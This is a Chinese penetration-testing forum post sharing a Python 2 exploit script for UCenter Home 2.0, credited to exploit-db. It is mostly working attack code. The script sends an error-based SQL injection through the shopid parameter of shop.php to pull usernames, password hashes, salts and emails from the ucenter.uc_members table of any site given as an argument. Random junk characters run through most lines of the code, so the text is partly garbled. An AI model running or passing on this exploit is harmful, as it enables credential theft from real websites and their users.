中国网络渗透测试联盟

标题: UCenter Home 2.0 EXP [打印本页]
作者: admin    时间: 2013-1-23 09:18
标题: UCenter Home 2.0 EXP
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
+ O7 x; P; V4 s   h& U0 \$ s3 n5 \4 \
4 P6 |. R: m: `/ Q
#!/usr/bin/env python  
. h# W, `+ ?) G! z- p' B
' ^: V( N9 Y1 ?' T1 J+ i2 f$ O4 _6 himport sys  
& p5 f% v6 h( m4 A1 C5 v" Qimport urllib2  
% R6 F* U0 l1 l# z" e2 I/ X/ Q+ Gimport re  
7 C' t, }; ?- |/ h  k # D/ E8 s3 z% _$ P, e
def info():  
% L  w/ E2 j3 [! T7 c- A/ R    print 'From:http://www.exploit-db.com/exploits/14997/'
* z; \" ~2 g. Q, c7 x    print 'http://www.hake.cc/Web_loudong/'   R. ^3 s6 Y  w5 D5 Z
    print 'changed:qiaoy'  + _, m0 U4 V* [0 O/ @2 C
    print 'exp:'  
3 v5 O2 _/ p! W& v; @. S    print ' ./UCenter_Home_2.0.py site'  7 n1 I( K1 `! f" K
  A) U/ W! q' g' y" b( V
def main():  
% Y) k, D  h/ L    if len(sys.argv) != 2:  4 `: @9 y- C1 O* e' D  z0 x
        info()  
  Q( @# W# O) P8 \" L    else:  
/ _) l/ \) {" q9 P        site = sys.argv[1]  % K; j* J" w8 ?, \& _4 E6 C
        if site[0:7] == 'http://':  8 S5 L2 O9 u- {0 T1 D* s. R: I
            sitesite =site  
- R+ |  z: b; y$ z" c        elif site[0:8] == 'https://':  + Y( n, H3 m! M) p* R5 s
            sitesite = site  $ C; N* c; h3 `9 u
        else:  - B/ S7 |+ d4 z" T3 m9 V8 S
            site = 'http://'+site  . R# N6 d, i- X8 i8 b8 v$ s
        try:  
; D1 @* J. S) u# o            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  
$ T4 @0 D8 e) G) Y# _9 v4 C/ B/ i            Value = urllib2.urlopen(url).read()  . U) d) N" j  y3 e8 _- {, A2 k
            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  
& d! G* U" F- }4 W            hacked = Msg.split(':')  + s5 |1 x2 p6 _3 C, C
            print 'Name:    '+hacked[1]  5 T' [- ~, P. k( ]6 o% j5 A
            print 'Passwd:  '+hacked[2]  
) U( x' t+ w/ P( U" ?' y; S6 |7 L* H            print 'salt:    '+hacked[3]  ; b8 `3 S" i& t9 `
            print 'email:   '+hacked[4]  3 c" L& e  K8 I0 u9 a- |% |# z
        except:  
) N+ r# B# {2 N: Q0 N4 d            print 'Sorry,I can\'t work............'  
6 U' m3 r# e9 l! g; Z5 c # `+ q$ ^' I* R; ]7 ~
if __name__ == '__main__':  7 E: P9 s3 ]2 P  l! @! N+ D
    main()



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2